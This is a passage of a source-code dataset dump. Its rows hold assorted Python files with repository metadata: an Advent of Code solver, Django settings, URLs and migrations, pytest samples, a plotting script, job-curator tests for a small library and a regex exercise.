if __name__ == "__main__":
unittest.main() | [
"huxinran427@gmail.com"
] | huxinran427@gmail.com |
1374558a2bbe4c328f01c9fab0de7f1e38f900e0 | ba834139d9e608e093b3407eec382ef3eece652e | /2015/09/09.py | 7130b806107a206552bc4d39bbc7037705a5b77b | [] | no_license | pberczi/advent-of-code | 815e044193a769fba0829d6720fbe1ec40d83b6d | ce3470bcb5e240eee3b0eee76f7ceed5c75c0b44 | refs/heads/master | 2021-06-09T06:29:27.475941 | 2016-12-26T22:44:19 | 2016-12-26T22:44:19 | 75,329,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | #!/usr/bin/python
import argparse
from itertools import permutations
# parse command line args
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--problem', metavar='n', type=int, default=1,
help='part of the question to solve')
parser.add_argument('input', metavar='input_path', type=str, nargs='?', default='input.txt',
help='path to input file')
args = parser.parse_args()
# Parse input lines of the form "A to B = N" into symmetric travel times.
data = []
with open(args.input, 'r') as f:
    data = f.read().splitlines()
travel_times = {}
places = set()
for line in data:
    route = line.split()
    src = route[0]
    dst = route[2]
    time = int(route[4])
    places.add(src)
    places.add(dst)
    # Key on the sorted pair so lookups work in either direction.
    travel_times[tuple(sorted([src, dst]))] = time
# Brute-force every visiting order of all places (Hamiltonian paths).
routes = list(permutations(places))
min_time = float('Inf')
max_time = 0
for route in routes:
    time = 0
    # Sum the leg times along consecutive stops of this ordering.
    for i in range(1,len(route)):
        src_dst = tuple(sorted([route[i-1], route[i]]))
        time += travel_times[src_dst]
    if time < min_time:
        min_time = time
    if time > max_time:
        max_time = time
# Shortest and longest total route lengths (puzzle parts 1 and 2).
print min_time, max_time
"p.berczi@gmail.com"
] | p.berczi@gmail.com |
a637e242d3a3557ae14b117e2d53f7f0034ed278 | de02d12703cf628017f31bca1c4079b5b3ab3af7 | /python-tech-demos/src/timer/time_mode.py | 2f82836f62d5fd088cfc6aa90981d8ac111f2b02 | [] | no_license | chrischendev/python-learn-demos | 0d13cd7a5d2de01dbf93f1793716a8375d33069c | 5d66e8a83b2985164395d57cb82eda8a23af4cee | refs/heads/master | 2021-07-07T13:47:03.049444 | 2020-10-10T03:13:06 | 2020-10-10T03:13:06 | 191,339,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | import time
# Blocking style: print a timestamp and a task message once per second,
# forever (the sleep blocks the main thread between iterations).
while True:
    print(time.strftime('%Y-%m-%d %X', time.localtime()), end=' : ')
    print('定时任务执行')  # runtime message: "scheduled task executed"
    time.sleep(1)
| [
"chrischen2018@163.com"
] | chrischen2018@163.com |
b0b1e8a074a52cef0b2bfb11b185ac680f4fe1f8 | ad75e772fd189aa1661ab0fec443a544b04994cd | /test_sample.py | 9decac360d8c1e1ea29821461ddda71d02c99569 | [
"MIT"
] | permissive | raymond-liao/web_ui_test_sample | 9fefd63e33f4012f21e06494476cf4464e7a6a61 | 8a6cc9b54b5f728af7ef0725dea42d759bd115d0 | refs/heads/master | 2023-05-11T13:05:04.653624 | 2020-03-10T08:48:58 | 2020-03-10T08:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | import pytest
# pytest in action – test_pytest_example_1.py
def function_1(var):
    """Return *var* incremented by one (trivial fixture under test)."""
    successor = var + 1
    return successor
@pytest.mark.sample
def test_success():
assert function_1(4) == 5
@pytest.mark.sample
def test_failure():
assert function_1(2) == 5
| [
"chengjia_liao@hotmail.com"
] | chengjia_liao@hotmail.com |
567e41f86400c398cb9844473478b4a7db3d831c | 956dbba4c050d75e12858bdac1504c31d4032958 | /CloudBridge/urls.py | 0d8be54e30125fbfec40bcf807346d142b3bee13 | [] | no_license | RastogiAbhijeet/CloudBridge | 406d7de6dbec8610256f2d4110e432df3bccd11e | 799c194d487a616ebde7876aa24c5382d0e72adf | refs/heads/master | 2021-04-09T13:27:43.644028 | 2018-03-16T14:14:52 | 2018-03-16T14:14:52 | 125,500,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
url(r'', include('filesharing.urls'))
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [
"abhijeetrastogi1997@gmail.com"
] | abhijeetrastogi1997@gmail.com |
ac9d24c57aa168fc4f49c1f1c4ecab87237bdec8 | 1d2c2bdb95136cd0732389f7947bbc9fe4c7ca44 | /sanic-web/apps/__init__.py | e0026afe27ff6e92c5c61c5314a7aaa24136395b | [] | no_license | da-peng/sanic-nginx-docker-example | a6004b646bce04978fa3bfd375cb0c5c743ee003 | 3978ba925d3d321e7ed45b90e2245cb87cc06e2f | refs/heads/master | 2022-08-16T02:25:51.111311 | 2019-08-27T11:22:50 | 2019-08-27T11:22:50 | 130,952,894 | 1 | 1 | null | 2022-08-06T05:59:17 | 2018-04-25T04:59:20 | Python | UTF-8 | Python | false | false | 1,018 | py | #encoding=utf-8
from sanic import Sanic
# Environment-variable configuration test: must be set before the app is
# initialised (i.e. before startup); variables set after startup require
# a service restart to take effect.
# from os import environ
# environ["MYAPP_CUSTOM_CONF"] = "42"
# environ["MYAPP_DEBUG"] = 'True'
# environ["MYAPP_ENV"] = 'DEV'
# Initialise the app; configuration is wired up during initialisation.
app = Sanic(__name__,load_env='MYAPP_')
from apps.config import CONFIG
# Apply configuration as an object (combines the common/default config
# with the per-environment config).
app.config.from_object(CONFIG)
# Environment configuration is expected to happen before blueprints are
# registered.
# Settings such as DB config come from system environment variables, all
# prefixed with MYAPP_. Alternatively SANIC_PREFIX = "SANIC_" is said to
# set the env-var prefix name -- untried here, seen in others' code.
# print(__name__)
# Names listed here are what `import *` exposes; anything not listed is
# not imported when the package is imported with *.
__all__ = ['urls','tasks','models','middle_ware','error']
# __all__ must be defined before `from apps import *` below.
from apps import *
| [
"xiaopeng.wu@qlchat.com"
] | xiaopeng.wu@qlchat.com |
8eacfffbda0654c3f08674730203074899e94cf0 | c40337ca035167e610d6599af236b2c6b1ba1fbb | /app/src/domain/schedule/model.py | f530810331f766ed590e4436e02d4d14fcd864c0 | [] | no_license | oksanaperekipska/staff-planning | a7f45af7dacadbdc59ee84b6d6e6b649bb23cbdf | 898d866ce93b7023452c05c1a9e0abb18b764bb0 | refs/heads/master | 2023-03-23T09:30:37.772993 | 2021-03-24T21:38:55 | 2021-03-24T21:38:55 | 351,229,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 106 | py | from pydantic import BaseModel
class Schedule(BaseModel):
    """API model for a staffing schedule attached to one airport."""
    id: int  # schedule primary key
    airport_id: int  # owning airport's primary key
    name: str  # human-readable schedule label
| [
"a.sidko@idev-hub.com"
] | a.sidko@idev-hub.com |
3a79f008e87da29da9382df753c959c1227d5abf | 591b1135f35313aeb3a5334004c55f65dec2ec77 | /2018/d05/p1.py | 4c1a799bada5f21e234d17f6ffe10b0c4f6ff298 | [] | no_license | KristobalJunta/aoc | cbc2b33f059b8815bcb82614d1a1317fdcce4fc7 | fd952427e6311d0d545dd7da3766c97aa4ee60bf | refs/heads/master | 2023-06-21T23:29:47.272089 | 2023-06-08T14:41:23 | 2023-06-08T14:44:42 | 159,981,944 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | from collections import Counter
def react(p, units):
    """Remove every adjacent opposite-case pair (e.g. 'aA' or 'Aa') of
    each unit letter from *p*, one unit at a time, and return the
    resulting string. A single pass may expose new pairs; callers loop
    until the output stabilises."""
    for lower in units:
        upper = lower.upper()
        p = p.replace(lower + upper, '')
        p = p.replace(upper + lower, '')
    return p
# Fully react the polymer: repeatedly strip adjacent opposite-polarity
# unit pairs (e.g. 'aA'/'Aa') until no more can be removed.
with open('input.txt') as infile:
    polymer = infile.read().strip()
print(polymer)
# Distinct unit letters present in the polymer (case-folded).
units = dict(Counter(polymer.lower())).keys()
while True:
    new_polymer = react(polymer, units)
    if new_polymer != polymer:
        polymer = new_polymer
    else:
        # No pair was removed this pass: the polymer is fully reacted.
        break
print(polymer)
print(len(polymer))
| [
"junta.kristobal@gmail.com"
] | junta.kristobal@gmail.com |
5d432b73e44a812c919798eb761e1993c584b700 | 4479f2dea600996f898b5fc8d820131cdd788995 | /accounts/migrations/0012_auto_20170630_1044.py | b63877cd0c1b6e30be32c3a47da17d1dd52c3b25 | [] | no_license | Drachenflo/audioQuery | fda661f3e1d9101f64db03395092697c783977d2 | 205520063573bf42f4531eda38bc8f29356ed0b0 | refs/heads/master | 2020-12-02T21:05:35.538325 | 2017-07-04T21:29:50 | 2017-07-04T21:29:50 | 96,253,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-30 08:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_auto_20170630_1008'),
]
operations = [
migrations.AlterField(
model_name='button',
name='preset',
field=models.CharField(choices=[('preset_reset', 1), ('preset_player', 1), ('preset_overlap', 2), ('preset_replay', 3)], default=0, max_length=2),
),
]
| [
"drachenflo@gmail.com"
] | drachenflo@gmail.com |
28cd395893c2d0508aed6884a9918e01db028f70 | b357eca98cc3ccb09ec55c7a9ad9c215694ae0cb | /shop/mainapp/migrations/0002_notebook_smartphone.py | c1f6d8a79e6814c3fcda58ff2a25e3c49adad84a | [] | no_license | irynaludanova/e-shop | 1c73b67e4439f0327e074af4290ac4fcf08ec633 | 473e8941d71fe0f95d10ca748ed37f64f54a211a | refs/heads/main | 2023-04-26T06:25:08.649261 | 2021-05-27T12:22:08 | 2021-05-27T12:22:08 | 370,921,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,736 | py | # Generated by Django 3.1.7 on 2021-05-24 10:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Smartphone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='Наименование')),
('slug', models.SlugField(unique=True)),
('image', models.ImageField(upload_to='', verbose_name='Изображение')),
('description', models.TextField(null=True, verbose_name='Описание')),
('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='Цена')),
('diagonal', models.CharField(max_length=255, verbose_name='Диагональ')),
('display_type', models.CharField(max_length=255, verbose_name='Тип дисплея')),
('resolution', models.CharField(max_length=255, verbose_name='Разрешение экрана')),
('accum_volume', models.CharField(max_length=255, verbose_name='Объем батареи')),
('ram', models.CharField(max_length=255, verbose_name='Оперативная память')),
('cd', models.BooleanField(default=True)),
('sd_volume_max', models.CharField(max_length=255, verbose_name='Максимальный объём встраиваемой памяти')),
('main_cam_mp', models.CharField(max_length=255, verbose_name='Главная камера')),
('frontal_cam_mp', models.CharField(max_length=255, verbose_name='Фронтальная камера')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.category', verbose_name='Категория')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Notebook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='Наименование')),
('slug', models.SlugField(unique=True)),
('image', models.ImageField(upload_to='', verbose_name='Изображение')),
('description', models.TextField(null=True, verbose_name='Описание')),
('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='Цена')),
('diagonal', models.CharField(max_length=255, verbose_name='Диагональ')),
('display_type', models.CharField(max_length=255, verbose_name='Тип дисплея')),
('processor_freq', models.CharField(max_length=255, verbose_name='Частота процессора')),
('ram', models.CharField(max_length=255, verbose_name='Оперативная память')),
('video', models.CharField(max_length=255, verbose_name='Видеокарта')),
('time_without_charge', models.CharField(max_length=255, verbose_name='Время работы аккумулятора')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.category', verbose_name='Категория')),
],
options={
'abstract': False,
},
),
]
| [
"irynaludanova@gmail.com"
] | irynaludanova@gmail.com |
69dc78d34f604ca8e3bef292bca231a51d485009 | 0c6189ee24daa1fa25351f1a9c51e50d004910bf | /mysite/settings.py | 6406c14e6e09b4aea9a62f299f4e6db3e3bff411 | [
"MIT"
] | permissive | Abbos0511/django-celery-rabbitmq | abc02d7538accaef29e10ded9db7ec41602b9a4a | a02fe7aecb6302b30654de7af9848933a105d3bf | refs/heads/main | 2023-06-30T14:56:58.172201 | 2021-08-09T10:26:36 | 2021-08-09T10:26:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,562 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-xt(wa+@b&s90m_vf15v!e)2_^tob%d9&z!%j!&4*hcy30q(pem'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
CELERY_BROKER_URL = 'amqp://localhost'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'alfabravo318@gmail.com' # put your gmail address here
EMAIL_HOST_PASSWORD = '<your-gmail-password>'
EMAIL_USE_TLS = True | [
"cinorouizi@gail.com"
] | cinorouizi@gail.com |
c8ad7af9d76ef8be5d1b26a289a1e34c63629ed6 | 00e01a758e72a51de6de169e66d1dbb3bd1d8403 | /Code/Plot_N1068_estim.py | 1ffb33a079e64bc58577148c93901d361a49b642 | [] | no_license | kstlaurent/NIRISS_NRM | 5b4645d06abe7bdd413eb8d723f39430c66b7277 | 84e6fa79cafe7a1580b1e96e58bbfddab5bcb69d | refs/heads/master | 2020-04-11T23:26:07.118511 | 2018-12-17T17:36:52 | 2018-12-17T17:36:52 | 162,166,652 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,243 | py | import sys, os, time
import numpy as np
import scipy.special
from scipy import signal
from astropy.io import fits
import math
from FigArray import FigArray
import numpy as np
import pylab as plt
import gc
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
import string
from datetime import datetime
from mpl_toolkits.mplot3d import Axes3D
LOC = '/Users/kstlaurent/NIRISS NRM/'
ESTIM_FILE = 'N1068_Estim/%s_OPD162_ff%.2f_F430M_N1068_N%0.E_noisy_bar%.1f.fits'#(pup,ff,phot)
estim_plot = 'N1068_Plots/NoisyEstimBars_%s_ff%.2f_162.pdf'#(pup,ff)
PUPILS = ['MASK_NRM','CLEARP']
BAR_BRIGHTNESS = [0.0,0.3,1.0]
Nphotons = [1E8,1E7]
FLAT_FIELD_ERROR = [0.00,0.01]
PWR = 0.15
CLP = .8
ov = 11
fov = 81
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
plotting the metric 'map'
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def grab_files(pup,ff):
estimlist = []
estimmaxlist = []
estimminlist = []
for bright in BAR_BRIGHTNESS:
for phot in Nphotons:
estim = fits.getdata(LOC+ESTIM_FILE%(pup,ff,phot,bright))[::-1,:]
print ESTIM_FILE%(pup,ff,phot,bright)
estimlist.append(estim)
estimmaxlist.append(estim.max())
estimminlist.append(estim.min())
return estimlist, estimmaxlist,estimminlist
def PlotOutput(pup,ff):
x = len(BAR_BRIGHTNESS)
y = len(Nphotons)
frameW = 1.5
frameH = 1.5
gapw = 0.05*np.ones(x+1)
gapw[0] = 0.2
gaph = 0.05*np.ones(y+1)
gaph[2] = 0.2
fig = FigArray(frameW, frameH, gapw, gaph)
(W, H) = fig.dimensions()
plt.figure(1, figsize=(W, H))
estimlist, estimmaxlist,estimminlist = grab_files(pup,ff)
ctr = 0
plt.text(0.03,1.06, "no bar", fontsize=10, rotation=0, color='k')
plt.text(0.32,1.06, "30% ring brightness", fontsize=10, rotation=0, color='k')
plt.text(0.76,1.06, "equal brightness", fontsize=10, rotation=0, color='k')
plt.text(-0.155,0.85, "$10^7$ photons", fontsize=10, rotation=90, color='k')
plt.text(-0.155,0.3, "$10^8$ photons", fontsize=10, rotation=90, color='k')
plt.axis("off")
for i in range(x):
for j in range(y):
dispim = np.power(estimlist[ctr],PWR)
dispim = dispim[36:46,36:46]
estimmax = np.power(estimmaxlist[ctr],PWR)
#origin set in top-left corner
a = plt.axes(fig.axes(i+1,j+1))
#plt.text(0.1,6, "brightness = %.1f" %(BAR_BRIGHTNESS[i]), fontsize=5, rotation=0, color='w')
#plt.text(0.1,13, "%.0E" %(Nphotons[j]), fontsize=5, rotation=0, color='w')
#plt.text(0.1, 20, "i = %d, j = %d"%(i,j), fontsize=5, rotation=0, color='y')
#plt.text(0.1, 25, "ctr = %d"%(ctr), fontsize=5, rotation=0, color='y')
p = plt.imshow(dispim,vmax = estimmax,vmin=0,cmap = 'gist_heat',interpolation='nearest')
a.xaxis.set_major_locator(plt.NullLocator())
a.yaxis.set_major_locator(plt.NullLocator())
plt.gray() # overrides current and sets default
ctr += 1
plt.savefig(LOC+estim_plot%(pup,ff), dpi=150)
plt.close()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def main():
for pup in PUPILS:
for ff in FLAT_FIELD_ERROR:
PlotOutput(pup,ff)
print 'done'
if __name__ == "__main__":
main() | [
"kstlaurent@johan.stsci.edu"
] | kstlaurent@johan.stsci.edu |
fc14710c5169e89597505c204e9e4235a06bf786 | a2603b496c61845496caa3969218d66f1dca16c4 | /alembic/versions/3d21a9e6821c_added_locked_param_to_task_model.py | 8000cb725a8f36390356b9e1e470218c6c67c0c6 | [] | no_license | RRCKI/panda-web-client | d65164b3e73b7a9e82fe91da8b17d7296a0f04ab | dfa7f14d8c6cb0f556ed6549254596a9c759b030 | refs/heads/master | 2021-01-23T14:19:52.463516 | 2017-07-17T12:57:38 | 2017-07-17T12:57:38 | 33,311,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | """added locked param to Task model
Revision ID: 3d21a9e6821c
Revises: 041111f828b0
Create Date: 2016-06-21 15:34:11.361072
"""
# revision identifiers, used by Alembic.
revision = '3d21a9e6821c'
down_revision = '041111f828b0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tasks', sa.Column('locked', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tasks', 'locked')
### end Alembic commands ### | [
"itertychnyy@gmail.com"
] | itertychnyy@gmail.com |
3964eb52503f38076997946862a10eb5c58df7a7 | c7967310054b3c8a557e12d245a626edfda8d9c0 | /tests/curator_tests.py | 44786bbfcbe0075263102adbdcf506299ed91a96 | [
"MIT"
] | permissive | kbokarius/oiot | feec13fbf574c5d836630d528ebe58cbc4b1e058 | 090f690877ece923d8f795d433faa95c2db449c0 | refs/heads/master | 2021-01-01T17:33:07.728731 | 2014-12-29T03:06:16 | 2014-12-29T03:06:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,532 | py | import os, sys, unittest, time
from datetime import datetime
from subprocess import Popen
import threading
from oiot import OiotClient, Job, CollectionKeyIsLocked, JobIsCompleted, \
JobIsRolledBack, JobIsFailed, FailedToComplete, Job, Curator, \
FailedToRollBack, RollbackCausedByException, JobIsTimedOut
from oiot.settings import _curator_heartbeat_timeout_in_ms, \
_additional_timeout_wait_in_ms, _max_job_time_in_ms, \
_jobs_collection, _locks_collection
from oiot.job import Job
from .test_tools import _were_collections_cleared, _oio_api_key, \
_verify_job_creation, _clear_test_collections, \
_verify_lock_creation
def run_test_curation_of_timed_out_jobs(client, test_instance):
test3_key = Job._generate_key()
response3 = client.put('test3', test3_key,
{'value_key3': 'value_value3'})
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
job = Job(client)
response2 = job.post('test2', {'value_key2': 'value_value2'})
response2.raise_for_status()
response = client.get('test2', response2.key,
response2.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key2': 'value_value2'}, response.json)
response3 = job.put('test3', test3_key,
{'value_newkey3': 'value_newvalue3'}, response3.ref)
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey3': 'value_newvalue3'},
response.json)
response4 = client.post('test4', {'value_key4': 'value_value4'})
response4.raise_for_status()
response = job.delete('test4', response4.key)
response.raise_for_status()
response = client.get('test4', response4.key, None, False)
test_instance.assertEqual(response.status_code, 404)
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
response = client.get('test2', response2.key, None, False)
test_instance.assertEqual(response.status_code, 404)
response = client.get('test3', test3_key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
response = client.get('test4', response4.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_key4': 'value_value4'}, response.json)
response = client.get(_jobs_collection, job._job_id,
None, False)
test_instance.assertEqual(response.status_code, 404)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
def run_test_curation_of_timed_out_locks(client, test_instance):
test2_key = Job._generate_key()
test3_key = Job._generate_key()
job = Job(client)
job._get_lock('test2', test2_key)
job._get_lock('test3', test3_key)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
response.raise_for_status()
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
def run_test_changed_records_are_not_rolled_back(client, test_instance):
test3_key = Job._generate_key()
response3 = client.put('test3', test3_key,
{'value_key3': 'value_value3'})
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
job = Job(client)
response2 = job.post('test2', {'value_key2': 'value_value2'})
response2.raise_for_status()
response = client.get('test2', response2.key,
response2.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key2': 'value_value2'}, response.json)
response2 = client.put('test2', response2.key,
{'value_changedkey2': 'value_changedvalue2'},
response2.ref, False)
response2.raise_for_status()
response3 = job.put('test3', test3_key,
{'value_newkey3': 'value_newvalue3'}, response3.ref)
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey3': 'value_newvalue3'},
response.json)
response3 = client.put('test3', test3_key,
{'value_changedkey3': 'value_changedvalue3'},
response3.ref, False)
response3.raise_for_status()
response4 = client.post('test4', {'value_key4': 'value_value4'})
response4.raise_for_status()
response = client.get('test4', response4.key, response4.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key4': 'value_value4'},
response.json)
response = job.delete('test4', response4.key)
response.raise_for_status()
response = client.put('test4', response4.key,
{'value_newkey4': 'value_newvalue4'}, False, False)
response.raise_for_status
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
response = client.get('test2', response2.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_changedkey2': 'value_changedvalue2'},
response.json)
response = client.get('test3', test3_key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_changedkey3': 'value_changedvalue3'},
response.json)
response = client.get('test4', response4.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey4': 'value_newvalue4'},
response.json)
response = client.get(_jobs_collection, job._job_id,
None, False)
test_instance.assertEqual(response.status_code, 404)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
class CuratorTests(unittest.TestCase):
def setUp(self):
# Verify o.io is up and the key is valid.
global _oio_api_key
self._client = OiotClient(_oio_api_key)
self._client.ping().raise_for_status()
self._curator_sleep_time_multiplier = 2.5
global _were_collections_cleared
if _were_collections_cleared is not True:
_clear_test_collections(self._client)
# Sleep to give o.io time to delete the collections. Without this
# delay inconsistent results will be encountered.
time.sleep(4)
_were_collections_cleared = True
self._curator_processes = []
# Start many curator processes to simulate a real environment.
for index in range(5):
self._curator_processes.append(Popen(['python', 'run_curator.py',
_oio_api_key]))
def tearDown(self):
for process in self._curator_processes:
process.kill()
def test_curation_of_timed_out_jobs(self):
run_test_curation_of_timed_out_jobs(self._client, self)
def test_curation_of_timed_out_locks(self):
run_test_curation_of_timed_out_locks(self._client, self)
def test_changed_records_are_not_rolled_back(self):
run_test_changed_records_are_not_rolled_back(self._client, self)
if __name__ == '__main__':
unittest.main()
| [
"bokarius@comcast.net"
] | bokarius@comcast.net |
407a17f2709c3927b4f2464518c610e3df7c44f2 | 9b0f155498c91b0c9a2f3730bdfc37a28e26f5b5 | /python_regexpr.py | 64c38041272e33e4d65ffb146546ff7b71f0694f | [] | no_license | suryathejaambati/python_functions | e799b439917e3739f0860a39b35f5c5b48263c06 | aa55dca564d17483ae23b53b0715276bd03e8b8d | refs/heads/master | 2022-05-28T07:53:00.478233 | 2020-05-05T11:30:01 | 2020-05-05T11:30:01 | 261,444,429 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | import re
#text="@ This is a python and it is easy to learni and it is popular one for dev automation 7 35 46 $"
text=" ispythonlanguage and it consists python2 version and python3 version"
#text="This is a ip address of my db1 server: 255.255.255.255 345627830374"
#text="This is python @ 345 _ - ("
#my_pat="sa"
#my_pat="i[ston]"
#my_pat="[abcd]"
#my_pat="[a-d]"
#my_pat="[a-f g-n s-z]"
#my_pat="\w"
#my_pat="\w\w"
#my_pat="\w\w\w"
#my_pat="\w\w\w\w"
#my_pat="\W"
#my_pat="\d"
#my_pat="python\d"
#my_pat="\d\d"
#my_pat="."
#my_pat=".."
#my_pat="..."
#my_pat="\."
#my_pat="\d\d\d"
#my_pat="\d\d\d.\d\d\d.\d\d\d.\d\d\d"
#my_pat="^i[ts]"
#my_pat="version$"
#my_pat=r"\bversion"
#my_pat=r"\bpython\b"
#my_pat=r"\Bpython\B"
my_pat=r"\tis"
#print(len(re.findall(my_pat,text)))
#print(re.findall(my_pat,text))
#text="This is python @ 345 _ - ("
#print(re.findall('\w',text))
#print(re.findall('.',text))
print(re.findall(my_pat,text))
| [
"ec2-user@ip-172-31-84-17.ec2.internal"
] | ec2-user@ip-172-31-84-17.ec2.internal |
